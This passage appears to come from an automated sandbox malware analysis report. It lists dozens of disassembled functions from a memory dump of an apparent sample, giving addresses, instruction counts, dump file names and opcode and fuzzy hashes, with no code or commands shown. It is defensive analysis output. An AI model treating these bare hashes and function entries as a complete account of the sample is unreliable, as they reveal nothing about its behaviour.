                                                                      • Instruction ID: 5bd4d3574879ddc699d6701a61897168fa1477107fc626978947090f19b5b953
                                                                      • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                      • Instruction Fuzzy Hash: 73516B75E0021EABDF15DF98C440BAFBBB9AF89754F04406EEA05EB251D734DA44CBA0
                                                                      Function 0195E9E0 Relevance: .2, Instructions: 154COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                      • Instruction ID: a6c3988ee86146fcff614401c79adc54044efa5a3a014aa6a44146653ed90dd2
                                                                      • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                      • Instruction Fuzzy Hash: 1F51C771D0020AAFDF51DF95C880FAEFB79AB40316F114665DD1AB7190E7329F4087A0
                                                                      Function 01998B28 Relevance: .2, Instructions: 152COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b29579ab4ba3f60e9f1663235faf811b5962eb20550ee612700c5cf4704192cb
                                                                      • Instruction ID: d4dc70bb160143076a2e97c1d4ca603e68285fc6b55d1ae302a2b06701df87d8
                                                                      • Opcode Fuzzy Hash: b29579ab4ba3f60e9f1663235faf811b5962eb20550ee612700c5cf4704192cb
                                                                      • Instruction Fuzzy Hash: 94410970B016499BEF29DB2DC894F3BBB9EEFD2221F08851CE95D87280E730D801C691
                                                                      Function 0195CBF0 Relevance: .1, Instructions: 148COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6b7401fdd67c8c877949ad6d960059435f8a89e7200a067941e8348d8fdbdb43
                                                                      • Instruction ID: 0411aa59148491456deb9892bb5f7303fd236d2f961836a16966efcf02b34be0
                                                                      • Opcode Fuzzy Hash: 6b7401fdd67c8c877949ad6d960059435f8a89e7200a067941e8348d8fdbdb43
                                                                      • Instruction Fuzzy Hash: C751697690031ADFCB60DFA9C9809AEBBBDFB48359B514919D949F3304D730AA01CB91
                                                                      Function 0190A430 Relevance: .1, Instructions: 139COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 667b234032cd9b7b231579a5c4be17397bf046b97631e4092591ba1993d4218d
                                                                      • Instruction ID: 7d0a0a7920f97d1f4cfe460773843cfeeaf7e015e68c8e0f0bb9eef94972d44b
                                                                      • Opcode Fuzzy Hash: 667b234032cd9b7b231579a5c4be17397bf046b97631e4092591ba1993d4218d
                                                                      • Instruction Fuzzy Hash: 3441F7726443029FDB27EF689881F6E776ABB59718F01042DED8EDB285D7B1D800C7A1
                                                                      Function 0199A9D3 Relevance: .1, Instructions: 139COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                      • Instruction ID: 4f5e203d356fb411f712b9a04833d614996e7d37e671740e4edf9a99cd10d5d4
                                                                      • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                      • Instruction Fuzzy Hash: AA41E631A027169FDF25CF6CC984A6AB7EEFF94315B05462EE91A87240EB34ED04C791
                                                                      Function 019001F8 Relevance: .1, Instructions: 138COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b7d6872ddb74bc0d69a872687b2fbdd046feb0ec997952f1c33569f39208bfeb
                                                                      • Instruction ID: ecba386fa50b7af10ba447d7711745b516b749255814e49eb0abcd2719721656
                                                                      • Opcode Fuzzy Hash: b7d6872ddb74bc0d69a872687b2fbdd046feb0ec997952f1c33569f39208bfeb
                                                                      • Instruction Fuzzy Hash: 7341CA35A00219DFDB16DF98C440BEEBBB8BF88740F18812AF909E7280D7359D41CBA4
                                                                      Function 018FEBFC Relevance: .1, Instructions: 138COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 367990ee3f6febfaa4304984b3fb007ee6184cf871403f6037f1ed5e1e637162
                                                                      • Instruction ID: 560c08ec0fb0f83318f177b6f4f9da8b85ef0bb731985d3d7315acdc834cbde5
                                                                      • Opcode Fuzzy Hash: 367990ee3f6febfaa4304984b3fb007ee6184cf871403f6037f1ed5e1e637162
                                                                      • Instruction Fuzzy Hash: C141B4726143059FD721EF2CC888A1777E9FF84318F01482DF656C7661DB75E9448B52
                                                                      Function 01912750 Relevance: .1, Instructions: 137COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                      • Instruction ID: 60ddc6a8fb8591aa1e1caa4a78ec617924fd4c7348882b2b597747a511669cfb
                                                                      • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                      • Instruction Fuzzy Hash: FC517C75A40215CFDB15CF5CC480AAEF7B6FF84710F2481A9D91AAB351D730AE41CB90
                                                                      Function 018D6154 Relevance: .1, Instructions: 133COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c158f5504787599df38c0b9cac46479a115f5182bba36cfbf54d8e452c4c73c4
                                                                      • Instruction ID: 02700d54e0e23a96d552c1db71f7cc86026e0b27b91f245e1db41ea0c5b0b712
                                                                      • Opcode Fuzzy Hash: c158f5504787599df38c0b9cac46479a115f5182bba36cfbf54d8e452c4c73c4
                                                                      • Instruction Fuzzy Hash: D451157090030ADFDB25DB28CC04BA9BBB5FF55318F2482A9E569E72C1E7349A81CF41
                                                                      Function 018D0BCD Relevance: .1, Instructions: 130COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c64c6fc0e551366680c2675a6eb81a27d6c170f5e445aa6aa797313205e12e8f
                                                                      • Instruction ID: 20817452d305168011e32464a0835e6e2eeec7d7e2053f90caf14b22f025e578
                                                                      • Opcode Fuzzy Hash: c64c6fc0e551366680c2675a6eb81a27d6c170f5e445aa6aa797313205e12e8f
                                                                      • Instruction Fuzzy Hash: D5418E75A003299BDB21EF6CC984BEA77B8AF45750F0100A5E909EB241D774DE84CB91
                                                                      Function 0199866E Relevance: .1, Instructions: 129COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                      • Instruction ID: 23b1f48e7989102708f65591ab250a660c56c7ad2887711b6e568381a406e466
                                                                      • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                      • Instruction Fuzzy Hash: A2419375B1020DABDF15DF9DCC84AAFBBBEAF89641F14406DE908AB341D670DE0087A0
                                                                      Function 018D0887 Relevance: .1, Instructions: 128COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8cd5d55e246b7cdb9bf241365f0428e28f8348ec2603163118201a048e1c4f2f
                                                                      • Instruction ID: 9d61730641b4ab4af79842c513c4364ad51aa6c3c169649f1d8f30b0cec07ee0
                                                                      • Opcode Fuzzy Hash: 8cd5d55e246b7cdb9bf241365f0428e28f8348ec2603163118201a048e1c4f2f
                                                                      • Instruction Fuzzy Hash: 9F41B2B1600706AFE325CF69C980A26B7F9FF49318F144A6DE54BC7A51E730EA45CB90
                                                                      Function 018FA470 Relevance: .1, Instructions: 127COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f0ebe3f82311fab41a61fe9d7641006af9c64e953de8ce81aa5be19d6f841b27
                                                                      • Instruction ID: b5404f444ada7f54fdd368909a460289862f1b6166bb7f58d7dbf70f2c48afee
                                                                      • Opcode Fuzzy Hash: f0ebe3f82311fab41a61fe9d7641006af9c64e953de8ce81aa5be19d6f841b27
                                                                      • Instruction Fuzzy Hash: 3241E231A4420ACFDB29DFACC4987AD7BB4FB58324F140159E519EB295DB34DA40CBA1
                                                                      Function 018D8BF0 Relevance: .1, Instructions: 124COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 70a0f726aa46808e67965a9b7993f773fd78f1e13c0d8b6cabadf969bbf7828e
                                                                      • Instruction ID: f8972ffd73cda77d22b5a42220fb5183db983ee6d5c670c616d4315fc7652f93
                                                                      • Opcode Fuzzy Hash: 70a0f726aa46808e67965a9b7993f773fd78f1e13c0d8b6cabadf969bbf7828e
                                                                      • Instruction Fuzzy Hash: 6441EF32A0530ACFD724DF5CC890A6ABBB6FB9AB04F14812AD905DB255C775DA42CF90
                                                                      Function 018C8918 Relevance: .1, Instructions: 123COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 97ed6950323e086f8f89b267f7143fbe7a6c6754a3effcb6bf99d957581ce2da
                                                                      • Instruction ID: 599264c2bc1abc2b5acb34376fbe14e6afc4fad3d193c7306ad6c275d98dbc50
                                                                      • Opcode Fuzzy Hash: 97ed6950323e086f8f89b267f7143fbe7a6c6754a3effcb6bf99d957581ce2da
                                                                      • Instruction Fuzzy Hash: 56416E315083169ED312DF69C840AABB7E9EF85B54F40092EFA85D7250E730DE098BA3
                                                                      Function 018CA020 Relevance: .1, Instructions: 122COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                      • Instruction ID: 1f835b885678698eed984d1db531e642bd4df7df9c81ece36b2fab2b4ef2f078
                                                                      • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                      • Instruction Fuzzy Hash: BE415E31A00229DBDB15EE1D8450FF97BB5EB50B95F15806EEA4ACB245E632CF40C791
                                                                      Function 018D09AD Relevance: .1, Instructions: 122COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b30f3990413907f472ce3611fb6ca95635cad938bc27f4433fcd07b0dbc733f1
                                                                      • Instruction ID: 5a6c48cf9c438b3cbfc7a711b8affd692517871f2b18d7bda06a21c80564619a
                                                                      • Opcode Fuzzy Hash: b30f3990413907f472ce3611fb6ca95635cad938bc27f4433fcd07b0dbc733f1
                                                                      • Instruction Fuzzy Hash: CC417C71A40701EFD721DF19C840B26BBF5FF55314F24866AE449CB251E771EA42CB92
                                                                      Function 01900710 Relevance: .1, Instructions: 121COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                      • Instruction ID: 8844315b422d8ca7ff93e89da86142d384f11719267b0417d6aebfdbbf3f1f34
                                                                      • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                      • Instruction Fuzzy Hash: E4412771A00605EFDB26CF98C980BAABBF9FF18740B14496DE55AD7291D330AA44CF91
                                                                      Function 018D262C Relevance: .1, Instructions: 119COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7793fd5a07a64c4ef617315bd33650831c3ee392aca230aaad1dda72ba0b40a1
                                                                      • Instruction ID: bd02da7991614e651b9ed06d965158d270ad14f7e10ada185a7fae52f0be30a1
                                                                      • Opcode Fuzzy Hash: 7793fd5a07a64c4ef617315bd33650831c3ee392aca230aaad1dda72ba0b40a1
                                                                      • Instruction Fuzzy Hash: 3E41AEB1501705CFCB22EF28D940B69B7F2FF95714F1582ADC44ADB2A5EB30AA41CB52
                                                                      Function 0190C8F9 Relevance: .1, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bbc2fbb35a355f523dec9e97737aefc3af41474712998f334ed5034460151ad0
                                                                      • Instruction ID: b75f1ed520095bd50af30f224fa8aaadff208a502d7a96f80b3d6e8a1f776137
                                                                      • Opcode Fuzzy Hash: bbc2fbb35a355f523dec9e97737aefc3af41474712998f334ed5034460151ad0
                                                                      • Instruction Fuzzy Hash: 543179B1A00245DFDB12CF98C040B99BBF4FF49B19F2085AED119EB291D3329902CB90
                                                                      Function 019505A7 Relevance: .1, Instructions: 111COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 664ef6c0e71fc370091f7fa92b02a88d6f1ef6c4396f5ef8ac854308173228f1
                                                                      • Instruction ID: 00ce5506c38d8a4f961462513bb2fe33d7cd1aba8deb8731de1a0a8c6e25f926
                                                                      • Opcode Fuzzy Hash: 664ef6c0e71fc370091f7fa92b02a88d6f1ef6c4396f5ef8ac854308173228f1
                                                                      • Instruction Fuzzy Hash: 6D41C2726056469FC320DF6CC841A6AB7E9BFC8700F180619F999A7680E730E905C7A6
                                                                      Function 018D4859 Relevance: .1, Instructions: 111COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 99024a2d1b96160bac5c1fe9a3d47ea832df65a11078a9f624043515fdba1554
                                                                      • Instruction ID: 0ed153248cfef94ec502dce2f8fd7f107e2d2c07e0d4adc63e23efb89a0b5adb
                                                                      • Opcode Fuzzy Hash: 99024a2d1b96160bac5c1fe9a3d47ea832df65a11078a9f624043515fdba1554
                                                                      • Instruction Fuzzy Hash: 4841E7702043029FD725DF2DD884B2ABBEAFF81354F14446DEA86CB6A1DB70DA51CB52
                                                                      Function 018E02E1 Relevance: .1, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                      • Instruction ID: c8d3f45293115fce18920aeb0a4c26a6bd0227b7614cb8e97dd15e2702b30d89
                                                                      • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                      • Instruction Fuzzy Hash: 58314831A04248AFDB118B6CCC44BDBBFE9EF55314F0445A5F819D7342C2B49A80CBA1
                                                                      Function 0197E3DB Relevance: .1, Instructions: 105COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4e8241ee4fc851e2bb8aab193c4be509815911384038405535b32e3ca3ceed4b
                                                                      • Instruction ID: b3f7939a47debe6bc7c270f40d2b7845d6ac2031182d346450b848d9ecae7cca
                                                                      • Opcode Fuzzy Hash: 4e8241ee4fc851e2bb8aab193c4be509815911384038405535b32e3ca3ceed4b
                                                                      • Instruction Fuzzy Hash: F731977575071AABDB22DF698C41FAB76E9AF59F50F000068FA04EB3D1DAA4DD00C7A1
                                                                      Function 01984B4B Relevance: .1, Instructions: 104COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 505f515dedc7d67cbcc0b9ecad36c9317b75323482ba7ae05891a09f2cd6cb79
                                                                      • Instruction ID: aa4cc414bb9363de6cd185cf56a130e393fd44d85c591b4201ba1a99e359a1ec
                                                                      • Opcode Fuzzy Hash: 505f515dedc7d67cbcc0b9ecad36c9317b75323482ba7ae05891a09f2cd6cb79
                                                                      • Instruction Fuzzy Hash: 423192326092029FC321EF1DD880F5AB7EAFF85361F09446EE9998B351D730E840CB91
                                                                      Function 018D4260 Relevance: .1, Instructions: 102COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 33d474bf47d6dcba65fce803a785b840acf8dc346a2737bbef57eeeae37a00c3
                                                                      • Instruction ID: e8fb286b5320198942f8fd7ec1b9c23331672f12207dde5c582562e38d94599a
                                                                      • Opcode Fuzzy Hash: 33d474bf47d6dcba65fce803a785b840acf8dc346a2737bbef57eeeae37a00c3
                                                                      • Instruction Fuzzy Hash: D741AE31200B45DFD726CF28C485F9A7BE9AF85714F144429F699CB650CB74E904CB90
                                                                      Function 01984BB0 Relevance: .1, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5894351e72c09549343336d011954a7e5015312269891ef84c5c66f76f3e0c2f
                                                                      • Instruction ID: 788efa10e7c0185507380e625d905f2afacb73da9441210fbb1a90dfb5f45856
                                                                      • Opcode Fuzzy Hash: 5894351e72c09549343336d011954a7e5015312269891ef84c5c66f76f3e0c2f
                                                                      • Instruction Fuzzy Hash: 04315D71A042029FD724EF29D880F6AB7E9FF84710F05496DF9999B391E730E904CB92
                                                                      Function 0194EB1D Relevance: .1, Instructions: 100COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3a0d822b8493a52c81688047b35d2dfb258057fe4b743828674cbfc7277b8191
                                                                      • Instruction ID: ab4007a8d2c4e4724f0d05bff5802516e372524400a47bd94e4780ddb77126f9
                                                                      • Opcode Fuzzy Hash: 3a0d822b8493a52c81688047b35d2dfb258057fe4b743828674cbfc7277b8191
                                                                      • Instruction Fuzzy Hash: FE31B031B016869BF326976ECD48F257BDCBB41B46F1D04A0AE499B6D2DB2CD841C225
                                                                      Function 019961C3 Relevance: .1, Instructions: 97COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8eee7de5d8068439c8b1f1b2779f4809874f4407fc1843ca26e94706c63d25d6
                                                                      • Instruction ID: 6ffbd4711faf09065978a8fe2116710e304110eb95d393abb75963c548ed81cd
                                                                      • Opcode Fuzzy Hash: 8eee7de5d8068439c8b1f1b2779f4809874f4407fc1843ca26e94706c63d25d6
                                                                      • Instruction Fuzzy Hash: F031E176A0021AABDB15DF9CCC40FAEB7B9FB48B40F4541A9E904EB244D770ED40CBA0
                                                                      Function 0197483A Relevance: .1, Instructions: 96COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2aca329f5298f08a257d28f183c2c84fda64fc73b52d5d49c561217976f28f05
                                                                      • Instruction ID: 7765bdad5c69ace7b2f92c0e0d0db631a32280b08b1a0b1c99f4bed0705a7523
                                                                      • Opcode Fuzzy Hash: 2aca329f5298f08a257d28f183c2c84fda64fc73b52d5d49c561217976f28f05
                                                                      • Instruction Fuzzy Hash: 00315376A4012DABCB21DF58DC84BDEBBF9AF98750F1100A5E50CA7251DA30DE918F90
                                                                      Function 018FEB20 Relevance: .1, Instructions: 96COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 78d382a6e22c233f8e44270b2c4368de27b05915f25ec9cf98401e9f007859cd
